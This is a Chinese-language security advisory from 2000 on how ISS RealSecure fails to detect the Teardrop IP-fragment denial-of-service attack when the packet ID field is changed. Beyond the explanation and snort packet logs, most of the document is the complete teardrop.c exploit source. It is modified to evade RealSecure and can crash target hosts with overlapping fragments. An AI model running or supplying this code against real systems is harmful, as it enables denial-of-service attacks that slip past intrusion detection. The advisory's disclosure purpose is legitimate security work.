首页 -> 安全研究
安全研究
安全漏洞
Realsecure 对Teardrop DoS攻击的检测可被轻易绕过
发布日期:2000-03-02
更新日期:2000-03-02
受影响系统:
Internet Security Systems RealSecure 3.2.1999描述:
Internet Security Systems RealSecure 3.2
Internet Security Systems RealSecure 3.1
Internet Security Systems RealSecure 3.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
某些版本的ISS(Internet Security Systems) RealSecure网络入侵检测软件存在一些问题。
攻击者可以进行一系列基于IP 分组的拒绝服务攻击,而RealSecure并不能检测出这种攻击
的存在。这是由于该软件对这种攻击的检测依赖于包本身的某些特征。如果攻击者略微修改
一下包的内容,RealSecure就不会认为这些包是在进行攻击。这种有问题的攻击主要是
Teardrop(泪滴)攻击及其变种,比如 SynDrop, NewTear, Targa 攻击等等。
泪滴攻击是由于很多操作系统的TCP/IP堆栈存在一个弱点,没有正确处理已分段的IP包的重
组。这种攻击发送2个或更多特别的分段IP数据报。第一个包是偏移量为0的段,payload(分
段长度)字节是N,并设置了MF位,第二个包是最后一个分段(MF==0),但它的偏移量小于N,
payload也小于N.这样两个分段就重叠了,为了重组这些包,有弱点的系统就会在TCP/IP栈中
分配非常大的空间,因此导致目标系统因为内存耗尽而停止响应或者重启。
在teardrop.c中,IP ID字段并没有在攻击中起什么作用,因而使用了定值:242,
*((u_short *)p_ptr) = htons(242); /* IP id */
通过将这个值改为242到666间的任意一个值,RealSecure就不能再检测到泪滴攻击了。
下面是用snort记录下修改前和修改后的teardrop 攻击包的情况:
原来的teardrop包 (可以被检测到):
02/11-09:37:03.822772 xxx.yyy.zzz.246 -> xxx.yyy.zzz.245
UDP TTL:64 TOS:0x0 ID:242 MF
Frag Offset: 0x0 Frag Size: 0x24
02/11-09:37:03.822829 xxx.yyy.zzz.246 -> xxx.yyy.zzz.245
UDP TTL:64 TOS:0x0 ID:242
Frag Offset: 0x3 Frag Size: 0x4
修改后的teardrop包 (不会被检测到):
02/11-09:37:07.967350 xxx.yyy.zzz.246 -> xxx.yyy.zzz.245
UDP TTL:64 TOS:0x0 ID:666 MF
Frag Offset: 0x0 Frag Size: 0x24
02/11-09:37:07.968076 xxx.yyy.zzz.246 -> xxx.yyy.zzz.245
UDP TTL:64 TOS:0x0 ID:666
Frag Offset: 0x3 Frag Size: 0x4
<* 来源: Stephane AUBERT <Stephane.Aubert@hsc.fr> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux kernels and
* NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* Modification : Stephane Aubert and Denis Ducamp
* Date : 14/02/2000
* (c) Herve Schauer Consultants 2000
* Description : change ID field to bypass ISS RealSecure
*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short,long);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
long ip_mf;
fprintf(stderr, "teardrop route|daemon9\\n\\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\\n", count);
fprintf(stderr, "[ ");
ip_mf = 0x2000;
for (i = 0; i < COUNT; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt,ip_mf);
fprintf(stderr, "b00m:%x ",ip_mf);
usleep(500);
ip_mf += 0x10;
}
fprintf(stderr, "]\\n");
return (0);
}
/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt, long ip_mf)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
/* SA/HSC : ID was 242 - change to 666 to bypass ISS RealSecure */
*((u_short *)p_ptr) = htons(666); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(ip_mf); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\\nsendto");
free(packet);
exit(1);
}
/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\\n",
name);
exit(0);
}
建议:
暂无
浏览次数:7725
严重程度:0(网友投票)
绿盟科技给您安全的保障